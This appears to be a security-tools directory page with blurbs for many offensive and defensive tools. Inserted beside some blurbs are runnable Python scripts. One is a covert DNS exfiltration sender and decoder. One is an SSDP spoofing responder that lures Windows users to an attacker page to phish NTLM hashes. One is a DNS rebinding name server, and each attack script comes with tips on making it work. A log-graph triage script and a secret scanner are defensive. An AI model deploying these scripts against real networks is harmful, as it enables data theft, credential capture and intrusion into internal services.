PowerShell Front-End for Windows Debugger Engine: DbgShell
The main impetus for DbgShell is that it’s just waaaay too hard to automate anything in the debugger. There are facilities today to assist in automating the debugger, of course. But in my opinion they are not meeting people’s needs. Using the built-in scripting language is arcane, limited,...
DNS Rebinding Attack Framework: Singularity
Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine’s IP address and to serve attack payloads to exploit vulnerable software on the target machine. It also ships with...
CLI for Ephemeral Penetration Testing: hideNsneak
This application assists in managing attack infrastructure for penetration testers by providing an interface to rapidly deploy, manage, and take down various cloud services. These include VMs, domain fronting, Cobalt Strike servers, API gateways, and firewalls. hideNsneak provides a simple...
PacketWhisper Exfiltration Toolset
PacketWhisper – Stealthily Transfer Data & Defeat Attribution Using DNS Queries & Text-Based Steganography, without the need for attacker-controlled Name Servers or domains; Evade DLP/MLS Devices; Defeat Data- & DNS Name Server Whitelisting Controls. Convert any file type e.g. executables, Office...
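The mechanism the blurb describes (file bytes turned into lookups of innocent-looking names, recovered by whoever can see the DNS traffic, no attacker name server required) is easy to show end to end. The following is an added example written for this page, not PacketWhisper's own code or cipher format: the 65 placeholder names under cdn-assets.example stand in for a real cipher list, and the random leftmost label that defeats the stub-resolver cache is this example's own choice.

```python
import base64
import secrets
import socket
import string
from typing import Callable, Iterable, List

# Constructed "cipher": one benign-looking FQDN per base64 symbol (64 symbols plus the
# '=' pad). A real sender would pick names that blend into the target's normal DNS
# traffic; the placeholder names below are an assumption made for this example.
B64_SYMBOLS = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/="
CIPHER = {sym: f"node{i:02d}.cdn-assets.example" for i, sym in enumerate(B64_SYMBOLS)}
REVERSE = {fqdn: sym for sym, fqdn in CIPHER.items()}


def encode_queries(data: bytes) -> List[str]:
    """Map a blob to the ordered list of names the sender must look up.

    Each base64 symbol becomes one cipher name. A random leftmost label makes every
    query unique, so the stub resolver cannot answer a repeated symbol from its cache
    (a cached lookup never reaches the wire and would be lost to the receiver).
    """
    names = []
    for sym in base64.b64encode(data).decode("ascii"):
        names.append(f"{secrets.token_hex(3)}.{CIPHER[sym]}")
    return names


def send_queries(names: Iterable[str],
                 resolve: Callable[[str], object] = socket.gethostbyname) -> int:
    """Issue the lookups. The answers do not matter (the names need not exist);
    only the fact that each query left the host does. Returns the number sent."""
    sent = 0
    for name in names:
        try:
            resolve(name)
        except OSError:
            pass  # NXDOMAIN or a timeout is expected and harmless
        sent += 1
    return sent


def decode_queries(observed: Iterable[str]) -> bytes:
    """Rebuild the blob from the query names seen in a capture, in capture order.

    Names that do not end in a cipher FQDN are ordinary traffic and are skipped,
    so the receiver can run over an unfiltered list of queried names.
    """
    symbols = []
    for name in observed:
        name = name.rstrip(".").lower()
        base = name.split(".", 1)[1] if "." in name else name
        sym = REVERSE.get(base)
        if sym is not None:
            symbols.append(sym)
    return base64.b64decode("".join(symbols))


if __name__ == "__main__":
    queries = encode_queries(b"constructed sample payload")
    # Pass resolve=socket.gethostbyname (the default) to really emit the lookups.
    send_queries(queries, resolve=lambda name: None)
    print(decode_queries(["www.example.com"] + queries))
```

The receiving side only needs the list of queried names in order, e.g. pulled from a pcap taken anywhere between the sender and its resolver; the same ordering requirement is why the sender must issue the lookups sequentially rather than in parallel.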
Mobile Application Testing Toolkit: Scrounger
Even though several other mobile application analysis tools have been developed, there is no one tool that can be used for both Android and iOS and can be called a “standard” must-use on every mobile application assessment. The idea behind Scrounger is to make a Metasploit-like tool that will not...
Dynamic Binary Analysis Tool: Manticore
Manticore is a prototyping tool for dynamic binary analysis, with support for symbolic execution, taint analysis, and binary instrumentation. Manticore comes with an easy-to-use command line tool that quickly generates new program “test cases” or sample inputs with symbolic execution. Each test...
The Offensive Web Application Penetration Testing Framework: TIDoS
TIDoS Framework is a comprehensive web-app audit framework. TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules. But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up APIKEYS.py...
Fast TCP tunnel over HTTP: chisel
Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH. It is a single executable including both client and server, written in Go (Golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. Chisel is very similar t...
Open Source Host & Endpoint Security: Wazuh
Wazuh is an open source security detection, visibility, and compliance project. It was born as a fork of OSSEC HIDS and was later integrated with the Elastic Stack and OpenSCAP, evolving into a more comprehensive solution. Wazuh helps you gain deeper security visibility into your infrastructure by...
Offensive and Defensive Cryptography: Crypton
Crypton is an educational library for learning and practicing offensive and defensive cryptography. It is basically a collection of explanations and implementations of all the existing vulnerabilities and attacks on various encryption systems (symmetric and asymmetric), digital signatures, message...
Bounded Model Checking Framework for Heap-implementations: HeapHopper
Heap metadata attacks have become one of the primary ways in which attackers exploit memory corruption vulnerabilities. While heap implementation developers have introduced mitigations to prevent and detect corruption, it is still possible for attackers to work around them. In part, this is becau...
Active Directory Privilege Relationships: BloodHound
BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell ingestor. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attacks c...
Covert Backdoor Transmission Method: GhostTunnel
GhostTunnel is a covert backdoor transmission method that can be used in an isolated environment. It attacks the target through an HID device only to deliver the payload agent; the HID device can be removed once the payload has been released. GhostTunnel uses 802.11 Probe Request Frames and...
Social Media Enumeration & Correlation Tool: Social Mapper
Social Mapper is an Open Source Intelligence tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to searching popular social media sites for targets' names and pictures to accurately detect and group a person’s...
Ring 0 Army Knife: r0ak
r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code (with some limitations) from the command prompt, without requiring anything other than Administrator privileges. Motivation: The Windows kernel is a rich environment in which hundreds of...
Subdomain Enumeration Tool: Amass
Amass is the subdomain enumeration tool with the greatest number of disparate data sources that performs analysis of the resolved names in order to deliver the largest number of quality results. Amass performs scraping of data sources, recursive brute forcing, crawling of web archives, permuting...
Compromising Online Accounts by Cracking Voicemail Systems: VoiceMailAutomator
voicemailautomator is a tool that serves as a Proof of Concept for the research I presented at DEF CON 26, “Compromising online accounts by cracking voicemail systems”. voicemailautomator supports two actions: “message” – retrieves and records the newest message in the voicemail system. It return...
An Open-Source Pre and Post Callback-Based Framework for macOS Kernel Monitoring: Kemon
If third-party vendors want to add new features to the macOS kernel, such as antivirus capabilities, ransomware blocking, data breach auditing, behavior monitoring and so on, they usually need the support of the system’s exported interfaces. At present, only two known official interfaces are...
Open source memory scanner written in C++: XenoScan
XenoScan is a memory scanner which can be used to scan the memory of processes to locate the specific locations of important values. These types of tools are typically used when hacking video games, as they allow one to locate the values representing the game’s state in memory. XenoScan is writte...
Defending Elections from Foreign Adversaries: Election Buster
Election Buster is an open source tool created in 2014 to identify malicious domains masquerading as candidate webpages and voter registration systems. During 2016, fake domains were used to compromise credentials of a Democratic National Committee (DNC) IT services company, and foreign adversaries...
Security Competition Infrastructure Automation Framework: Laforge
Laforge enables rapid development of infrastructure for the purpose of information security competitions. Using a simple and intuitive configuration language, Laforge manages a dependency graph and state management and allows for highly productive remote collaboration. The Laforge engine uses a...
Backdooring and Breaking Signatures: SMBetray
In SMB connections, the security mechanisms protecting the integrity of the data passed between the server and the client are SMB signing and encryption. When SMB signing is used, the signatures on SMB packets are based on keys derived from information sent over the network in cleartext during the...
OWA for hackers: ExchangeRelayX
ExchangeRelayX is a PoC tool that demonstrates an attacker's ability to perform an SMB- or HTTP-based NTLM relay attack against the EWS endpoint of an on-premises Microsoft Exchange server in order to compromise the victim's mailbox. The tool provides the attacker with an OWA-looking interface, with...
Microsoft Research Detours Package
Detours is a software package for monitoring and instrumenting API calls on Windows. Detours has been used by many ISVs and is also used by product teams at Microsoft. Detours is now available under a standard open source license (MIT). This simplifies licensing for programmers using Detours and...
Dynamic API Call Tracer for Windows and Linux Applications: Drltrace
Drltrace is a dynamic API call tracer for Windows and Linux applications designed primarily for malware analysis. Drltrace is built on top of the DynamoRIO dynamic binary instrumentation framework. Motivation: Malware analysis is not an easy task. Sophisticated software packers like Themida and...
A framework for creating proxies: Mallet
Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic. It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the...
Detect Evil Maid Attacks: Do Not Disturb
Physical access or “evil maid” attacks are some of the most insidious threats faced by those of us who travel with our Macs. Do Not Disturb (DND) is a free, open-source utility that aims to detect and alert you of such attacks! One of the best ways to compromise a computer is with physical access...
Rogue Access Point Toolkit : hostapd-mana
hostapd-mana is a feature-rich rogue Wi-Fi access point tool. It can be used for a myriad of purposes, from tracking and deanonymising devices (aka Snoopy), to gathering corporate credentials from devices attempting EAP (aka WPE), to attracting as many devices as possible to connect in order to perform MitM attacks...
Build Your Own Botnet: BYOB
BYOB is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability ...
Lightning Fast Web Crawler: Photon
Photon is a lightning-fast web crawler which extracts URLs, files, intel & endpoints from a target. 160 requests per second while doing extensive data extraction is just another day for Photon! Main Features: Data Extraction. Photon extracts the following data while crawling by default: URLs (in-scope &...
Network and System Reconnaissance Tool: Sandmap
Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine. It provides a user-friendly interface, automates and speeds up scanning and allows you to easily use many advanced scanning techniques. Key Features: simple CLI with the ability to run the pure Nmap engine...
Reconnaissance and Vulnerability Scanning Tool: Raccoon
Raccoon is a tool made for reconnaissance and information gathering with an emphasis on simplicity. It will do everything from fetching DNS records, retrieving WHOIS information, obtaining TLS data, detecting WAF presence and up to threaded dir busting and subdomain enumeration. Every scan output...
Advanced Man in the Middle Attack Framework: Evilginx
Evilginx is an attack framework for setting up phishing pages. Instead of serving lookalike templates of sign-in pages, Evilginx becomes a relay between the real website and the phished user. The phished user interacts with the real website, while Evilginx captures all the data being transmitted...
Payload Generation Framework: SharpShooter
SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw’s DotNetToJScript tool to invoke methods from the...
Block Unauthorized macOS Outgoing Network Traffic: LuLu
LuLu is the free, shared-source firewall for macOS. Its goal is simple: block any unknown outgoing connection until approved by the user. While it was designed to generically detect malware by flagging unauthorized network connections, LuLu can also be used to block OS components or 3rd-par...
Query Windows Machine for RAM Artifacts: memtriage
Allows you to quickly query a live Windows machine for RAM artifacts. This tool uses the Winpmem drivers to access physical memory and Volatility for analysis. Caveats: doesn't work with Device Guard enabled; should be tested on machines before deploying. Example Usage: usage: memtriage.exe -...
Spoof SSDP replies to phish for NTLM hashes: evil-ssdp
This tool responds to SSDP multicast discovery requests, posing as a generic UPnP device on the local network. Your spoofed device will magically appear in Windows Explorer on machines in your local network. Users who are tempted to open the device are shown a configurable webpage. By default, this...
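The exchange the blurb relies on is small: a host sends an M-SEARCH to the SSDP multicast group, anyone on the segment may answer with a unicast 200 OK whose LOCATION points at a device-description XML, and the presentationURL inside that XML is what Explorer opens when the user double-clicks the device. The following is an added example written for this page, not evil-ssdp's own code or templates; the attacker web server address 192.0.2.10:8888, the device UUID and the XML fields are constructed assumptions.

```python
import socket
import struct
from typing import Dict, Optional

SSDP_GROUP, SSDP_PORT = "239.255.255.250", 1900
# Assumed attacker web server hosting both the device description and the phishing page.
ATTACKER_HTTP = "http://192.0.2.10:8888"
# Constructed device identity; any stable UUID works.
DEVICE_USN = "uuid:2f1a6e0c-5b3d-4c7e-9a8f-0d1e2f3a4b5c"


def parse_msearch(datagram: bytes) -> Optional[Dict[str, str]]:
    """Return the headers of an SSDP M-SEARCH discovery request, or None for anything else."""
    lines = datagram.decode("utf-8", "replace").split("\r\n")
    if not lines[0].upper().startswith("M-SEARCH "):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header block
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().upper()] = value.strip()
    if headers.get("MAN", "").strip('"') != "ssdp:discover":
        return None  # not a discovery request (e.g. a NOTIFY announcement)
    return headers


def build_reply(headers: Dict[str, str], location_base: str = ATTACKER_HTTP,
                usn: str = DEVICE_USN) -> bytes:
    """Build the unicast 200 OK that advertises the fake device.

    The searcher learns only a LOCATION URL; everything else about the device comes
    from the XML it fetches there, which is why that web server must be the attacker's.
    """
    st = headers.get("ST", "ssdp:all")
    if st in ("", "ssdp:all"):
        st = "upnp:rootdevice"  # a wildcard search is answered as a root device
    reply = [
        "HTTP/1.1 200 OK",
        "CACHE-CONTROL: max-age=1800",
        "EXT:",
        f"LOCATION: {location_base}/ssdp/device-desc.xml",
        "SERVER: UPnP/1.0",
        f"ST: {st}",
        f"USN: {usn}::{st}",
        "",
        "",
    ]
    return "\r\n".join(reply).encode("ascii")


def device_description_xml(presentation_url: str, usn: str = DEVICE_USN) -> str:
    """Minimal UPnP device description. presentationURL is the page Windows opens
    when the user double-clicks the device in the Network view, i.e. the phish."""
    return (
        '<?xml version="1.0"?>\n'
        '<root xmlns="urn:schemas-upnp-org:device-1-0">\n'
        "  <specVersion><major>1</major><minor>0</minor></specVersion>\n"
        "  <device>\n"
        "    <deviceType>urn:schemas-upnp-org:device:Basic:1</deviceType>\n"
        "    <friendlyName>Shared Documents</friendlyName>\n"
        "    <manufacturer>Example</manufacturer>\n"
        "    <modelName>Document Server</modelName>\n"
        f"    <UDN>{usn}</UDN>\n"
        f"    <presentationURL>{presentation_url}</presentationURL>\n"
        "  </device>\n"
        "</root>\n"
    )


def serve_forever(bind_ip: str = "0.0.0.0") -> None:
    """Join the SSDP multicast group and answer every discovery request (needs a real LAN)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((bind_ip, SSDP_PORT))
    membership = struct.pack("4s4s", socket.inet_aton(SSDP_GROUP), socket.inet_aton(bind_ip))
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)
    while True:
        data, source = sock.recvfrom(4096)
        headers = parse_msearch(data)
        if headers is not None:
            sock.sendto(build_reply(headers), source)  # unicast back to the searcher
```

Two things to note when running this: the reply must echo the searcher's ST (or map the ssdp:all wildcard to upnp:rootdevice) or Windows ignores it, and an HTTP server must actually answer at the LOCATION URL with the XML above, since Explorer fetches it before listing the device. On the defensive side, a UDP/1900 M-SEARCH answered by a host that is not a known device is the observable to alert on.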
Firewall and Privatizing Proxy: macOS Fortress
macOS-Fortress is a firewall, blackhole, and privatizing proxy for trackers, attackers, malware, adware, and spammers. It provides kernel-level, OS-level, and client-level security for macOS. It was built to address a steady stream of attacks visible in snort and server logs, and it also blocks ads, malicious...
Active Directory Reconnaissance: ADRecon
ADRecon is a tool which extracts various artifacts as highlighted below out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis. The report can provide a holistic picture of the current state of the target AD...
Indonesian Penetration Testing LFS: Dracos Linux
Dracos Linux is an open source Linux operating system from Indonesia, built from Linux From Scratch and released under the GNU General Public License v3.0. It is a Linux distribution used to perform security testing (penetration testing)...
DNS Rebinding Attack: DNS Rebind Toolkit
DNS Rebind Toolkit is a frontend JavaScript framework for developing DNS Rebinding exploits against vulnerable hosts and services on a local area network (LAN). It can be used to target devices like Google Home, Roku, Sonos WiFi speakers, WiFi routers, “smart” thermostats, and other IoT devices. Wi...
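Both Singularity of Origin (above) and DNS Rebind Toolkit depend on the same server-side trick: an authoritative name server that answers the first lookup of an attack name with the attacker's IP, so the browser loads the attack page from that origin, and later lookups of the same name with the victim-side target IP, so the page's follow-up requests to "its own" origin land on the internal service. The following is an added example written for this page, not code from either project; the zone rebind.attacker.example, the addresses 203.0.113.10 (attacker) and 127.0.0.1 (target), and the first-then-second strategy keyed on a per-session label are assumptions chosen for the example (Singularity offers several answer strategies; this is the simplest).

```python
import socket
import struct
from typing import Dict, Optional, Tuple

ATTACKER_IP = "203.0.113.10"  # assumed: serves the rebinding page (first answer)
TARGET_IP = "127.0.0.1"       # assumed: service on the victim's side (later answers)
TTL = 0                       # ask the client to re-resolve immediately (a hint only)


def encode_name(name: str) -> bytes:
    """Wire-format a domain name as length-prefixed labels."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(packet: bytes, offset: int) -> Tuple[str, int]:
    """Read an uncompressed name (as found in a question section); return it and the next offset."""
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """A standard recursion-desired A query, used here to exercise the responder."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


class Rebinder:
    """Authoritative responder for one zone with a first-then-second strategy: the first
    A lookup of a given name gets the attacker IP, every later lookup gets the target IP.
    State is keyed on the full queried name, so each attack session uses its own label
    (the server only ever sees the victim's recursive resolver, not the victim itself)."""

    def __init__(self, zone: str, attacker_ip: str = ATTACKER_IP, target_ip: str = TARGET_IP):
        self.zone = zone.rstrip(".").lower()
        self.attacker_ip, self.target_ip = attacker_ip, target_ip
        self.lookups: Dict[str, int] = {}  # queried name -> A lookups answered so far

    def answer_ip(self, qname: str) -> Optional[str]:
        qname = qname.rstrip(".").lower()
        if qname != self.zone and not qname.endswith("." + self.zone):
            return None  # not ours
        count = self.lookups.get(qname, 0)
        self.lookups[qname] = count + 1
        return self.attacker_ip if count == 0 else self.target_ip

    def respond(self, query: bytes) -> bytes:
        txid = struct.unpack("!H", query[:2])[0]
        qname, offset = decode_name(query, 12)
        qtype = struct.unpack("!H", query[offset:offset + 2])[0]
        question = query[12:offset + 4]
        ip = self.answer_ip(qname) if qtype == 1 else None
        if ip is None:
            # QR|AA|RD|RA set, RCODE=3 (NXDOMAIN), no answer records
            return struct.pack("!HHHHHH", txid, 0x8583, 1, 0, 0, 0) + question
        # QR|AA|RD|RA set, RCODE=0, one A record whose name points back at the question (0xC00C)
        header = struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 0, 0)
        answer = struct.pack("!HHHIH", 0xC00C, 1, 1, TTL, 4) + socket.inet_aton(ip)
        return header + question + answer


def parse_answer_ip(response: bytes) -> Optional[str]:
    """Pull the A record out of a response built by Rebinder (None if there is no answer)."""
    if struct.unpack("!H", response[6:8])[0] == 0:
        return None
    _, offset = decode_name(response, 12)
    offset += 4  # skip QTYPE/QCLASS of the echoed question
    rdlength = struct.unpack("!H", response[offset + 10:offset + 12])[0]
    return socket.inet_ntoa(response[offset + 12:offset + 12 + rdlength])


def serve(rebinder: Rebinder, bind: Tuple[str, int] = ("0.0.0.0", 53)) -> None:
    """UDP loop; delegate the zone's NS record to this host to use it for real."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        data, addr = sock.recvfrom(512)
        sock.sendto(rebinder.respond(data), addr)
```

Three caveats a practitioner hits immediately: recursive resolvers and browsers keep their own caches whatever TTL the server sends, so the attack page has to keep retrying until the answer flips; the target service must accept requests whose Host header carries the attack name (a check of Host against an allow-list defeats the whole technique); and because the authoritative server only sees the resolver's address, per-victim state has to live in the queried name, which is why the example keys on the full label rather than on the client IP.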
Subdomain Discovery Tool: SubFinder
SubFinder is a subdomain discovery tool that uses various techniques to discover massive amounts of subdomains for any target. It has been aimed as a successor to the sublist3r project. SubFinder uses Passive Sources, Search Engines, Pastebins, Internet Archives, etc to find subdomains and then ...
The OSINT Omnibus
An Omnibus is defined as a volume containing several novels or other items previously published separately and that is exactly what the InQuest Omnibus project intends to be for Open Source Intelligence collection, research, and artifact management. By providing an easy to use interactive command...
Visualizing Windows Active Directory Event Logs: LogonTracer
Investigate malicious logons by visualizing and analyzing Windows Active Directory event logs. LogonTracer associates the host name or IP address and the account name found in logon-related events and displays them as a graph. This way, it is possible to see on which account a login attempt occurs and...
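The association the blurb describes is a graph whose nodes are accounts and source hosts/IPs and whose edges are the logon events that connect them; once it exists, the interesting patterns (one account succeeding on many hosts, one source failing against many accounts) are simple queries over it. The following is an added example written for this page, not LogonTracer's own code (which stores the graph in Neo4j and renders it in a browser): the event records are constructed, with field names taken from the EventData of 4624/4625, and the thresholds for "lateral movement" and "spraying" are assumptions.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed records, as they would look after parsing the Security log. Field names
# follow the EventData of 4624 (success) and 4625 (failure); hosts and users are invented.
EVENTS = [
    {"EventID": 4624, "Computer": "WS-ALICE.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "alice", "LogonType": 2, "IpAddress": "-", "WorkstationName": "WS-ALICE"},
    {"EventID": 4624, "Computer": "FS01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "alice", "LogonType": 3, "IpAddress": "10.0.0.15", "WorkstationName": "WS-ALICE"},
    {"EventID": 4624, "Computer": "FS01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "svc-backup", "LogonType": 3, "IpAddress": "10.0.0.15", "WorkstationName": "WS-ALICE"},
    {"EventID": 4624, "Computer": "DC01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "svc-backup", "LogonType": 3, "IpAddress": "10.0.0.15", "WorkstationName": "WS-ALICE"},
    {"EventID": 4624, "Computer": "SQL01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "svc-backup", "LogonType": 10, "IpAddress": "10.0.0.15", "WorkstationName": "WS-ALICE"},
    {"EventID": 4625, "Computer": "DC01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "bob", "LogonType": 3, "IpAddress": "10.0.0.77", "WorkstationName": "-"},
    {"EventID": 4625, "Computer": "DC01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "carol", "LogonType": 3, "IpAddress": "10.0.0.77", "WorkstationName": "-"},
    {"EventID": 4625, "Computer": "DC01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "dave", "LogonType": 3, "IpAddress": "10.0.0.77", "WorkstationName": "-"},
    {"EventID": 4624, "Computer": "DC01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "FS01$", "LogonType": 3, "IpAddress": "10.0.0.21", "WorkstationName": "FS01"},
]

Edge = Tuple[str, str]  # (account, source host name or IP)


def build_graph(events) -> Dict[Edge, dict]:
    """One edge per (account, source) pair, carrying success/failure counts, the hosts
    logged on to, and the logon types seen. Machine and built-in accounts are dropped
    because they dominate the log without telling you where a human went."""
    graph = defaultdict(lambda: {"success": 0, "failure": 0, "targets": set(), "types": set()})
    for ev in events:
        if ev["EventID"] not in (4624, 4625):
            continue
        user = ev["TargetUserName"]
        if user.endswith("$") or user.upper() in ("SYSTEM", "ANONYMOUS LOGON", "-"):
            continue
        account = f"{ev['TargetDomainName']}\\{user}".lower()
        source = ev.get("IpAddress", "-")
        if source in ("-", "::1", "127.0.0.1"):  # local logon: fall back to the workstation name
            source = ev.get("WorkstationName", "-")
        if source == "-":
            source = ev["Computer"].split(".")[0]
        info = graph[(account, source.lower())]
        info["success" if ev["EventID"] == 4624 else "failure"] += 1
        info["targets"].add(ev["Computer"].split(".")[0].lower())
        info["types"].add(ev["LogonType"])
    return dict(graph)


def lateral_movement(graph: Dict[Edge, dict], min_hosts: int = 2) -> List[str]:
    """Accounts whose remote logons (network=3, RDP=10) succeeded on at least min_hosts distinct hosts."""
    hosts = defaultdict(set)
    for (account, _), info in graph.items():
        if info["success"] and info["types"] & {3, 10}:
            hosts[account] |= info["targets"]
    return sorted(a for a, h in hosts.items() if len(h) >= min_hosts)


def spraying_sources(graph: Dict[Edge, dict], min_accounts: int = 3) -> List[str]:
    """Sources that failed authentication against at least min_accounts distinct accounts."""
    accounts = defaultdict(set)
    for (account, source), info in graph.items():
        if info["failure"]:
            accounts[source].add(account)
    return sorted(s for s, a in accounts.items() if len(a) >= min_accounts)


def to_dot(graph: Dict[Edge, dict]) -> str:
    """Graphviz rendering: accounts and sources as nodes, failure-only edges dashed."""
    def esc(s: str) -> str:
        return s.replace("\\", "\\\\")
    lines = ["graph logons {"]
    for (account, source), info in sorted(graph.items()):
        style = "dashed" if info["failure"] and not info["success"] else "solid"
        label = f"ok={info['success']} fail={info['failure']} on {','.join(sorted(info['targets']))}"
        lines.append(f'  "{esc(account)}" -- "{esc(source)}" [style={style}, label="{label}"];')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    g = build_graph(EVENTS)
    print("lateral movement:", lateral_movement(g))
    print("spraying sources:", spraying_sources(g))
    print(to_dot(g))
```

On the constructed data the service account is flagged because it succeeded from alice's workstation on three servers over network/RDP logons, and 10.0.0.77 is flagged because it failed against three different accounts; alice's own logons stay unremarkable. The same two queries, run over a real day of domain controller logs, are a reasonable first triage before opening the graph itself.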
Search Secrets in Various File Types: DumpsterDiver
DumpsterDiver is a tool for analyzing big volumes of files of various types in search of hardcoded secrets (e.g. AWS access keys, Azure share keys or SSH keys) by measuring their entropy. Additionally, it allows creating simple search rules with basic conditions (e.g. report only CSV files...
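Entropy-based secret hunting works because a random key has a flatter symbol distribution than identifiers or prose, so its Shannon entropy (bits per character) is higher; the catch is that the ceiling depends on the alphabet, so a hex secret can never score as high as a base64 one and needs its own threshold, and some structured keys (an AWS access key ID, for instance) are not random enough to clear either bar and need a pattern rule. The following is an added example written for this page, not DumpsterDiver's own code or its default settings; the thresholds, the token length and the sample configuration text are constructed assumptions, and the two AWS-looking values are the placeholder credentials from AWS's own documentation.

```python
import math
import re
from typing import List, Optional, Tuple

# Thresholds in bits per character. Assumed for this example: random base64 text tends to
# exceed the first and random hex the second, while identifiers and English do not.
MIN_LENGTH = 20
BASE64_EDGE = 4.3
HEX_EDGE = 3.0
TOKEN = re.compile(r"[A-Za-z0-9+/=_\-]{%d,}" % MIN_LENGTH)
HEX_ONLY = re.compile(r"[0-9a-fA-F]+")
# A pattern rule on top of the entropy check: AWS access key IDs have a fixed shape
# but are too regular to pass the entropy test on their own.
AWS_ACCESS_KEY_ID = re.compile(r"\bAKIA[0-9A-Z]{16}\b")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character, estimated from the symbol frequencies in s."""
    if not s:
        return 0.0
    counts: dict = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def classify(token: str) -> Optional[str]:
    """'hex' or 'base64' if the token's entropy is in the secret range for its alphabet, else None."""
    h = shannon_entropy(token)
    if HEX_ONLY.fullmatch(token):
        return "hex" if h >= HEX_EDGE else None
    return "base64" if h >= BASE64_EDGE else None


Finding = Tuple[int, str, str]  # (line number, kind, token)


def scan_text(text: str) -> List[Finding]:
    """Run the pattern rule and the entropy check over every line of text."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in AWS_ACCESS_KEY_ID.finditer(line):
            findings.append((lineno, "aws-access-key-id", m.group(0)))
        for m in TOKEN.finditer(line):
            kind = classify(m.group(0))
            if kind:
                findings.append((lineno, f"high-entropy-{kind}", m.group(0)))
    return findings


def scan_file(path: str) -> List[Finding]:
    with open(path, "r", errors="replace") as fh:
        return scan_text(fh.read())


# Constructed sample; the AKIA.../wJal... values are AWS's documentation placeholders.
SAMPLE = """\
# constructed config excerpt for the example
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
api_timeout_seconds = 30
session_token = 3f9a2c7d8e1b4a6c9d0e5f7a8b2c4d6e
"""

if __name__ == "__main__":
    for lineno, kind, token in scan_text(SAMPLE):
        print(f"line {lineno}: {kind}: {token}")
```

Running it over the sample reports three things: the access key ID by pattern, the 40-character secret key by base64 entropy, and the 32-character hex token by hex entropy, while the identifier aws_secret_access_key (long enough to be a token, but low entropy) is correctly ignored. Tuning the two edges against a corpus of the target's real code is most of the work in practice; too low and every URL-safe identifier becomes a finding, too high and short secrets slip through because a 20-character token cannot exceed log2(20) bits per character no matter how random it is.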
ZigBee Security Research Toolkit: KillerBee
KillerBee framework is a tool for attacking ZigBee and IEEE 802.15.4 networks. KillerBee is designed to simplify the process of sniffing packets from the air interface or a supported packet capture file (libpcap or Daintree SNA), and for injecting arbitrary packets. Helper functions including IEEE...
RF Fuzzing Framework: TumbleRF
TumbleRF is a framework that orchestrates the application of fuzzing techniques to RF systems. While fuzzing has always been a powerful mechanism for fingerprinting and enumerating bugs within software systems, the application of these techniques to wireless and hardware systems has historically...
Detailed Heap Profiler: Memoro
Memoro is a highly detailed heap profiler. Memoro not only shows you where and when your program makes heap allocations, but will show you how your program actually used that memory. Memoro collects detailed information on accesses to the heap, including reads and writes to memory and when they...
Network Share Sniffer and Auto-Mounter for Crawling Remote File Systems: sharesniffer
sharesniffer is a network analysis tool for finding open and closed file shares on your local network. It includes auto-network discovery and auto-mounting of any open CIFS and NFS shares. How to use: for example, to find all hosts on any local network with open/closed NFS/SMB shares: python...
Pure python post-exploitation RAT for macOS & OSX: EvilOSX
A pure Python, post-exploitation RAT (Remote Administration Tool) for macOS / OSX. Features: emulates a simple terminal instance; undetected by anti-virus; OpenSSL AES-256 encrypted payloads, HTTPS communication; multi-threaded; no client dependencies (pure Python); persistent; simple extendable module syst...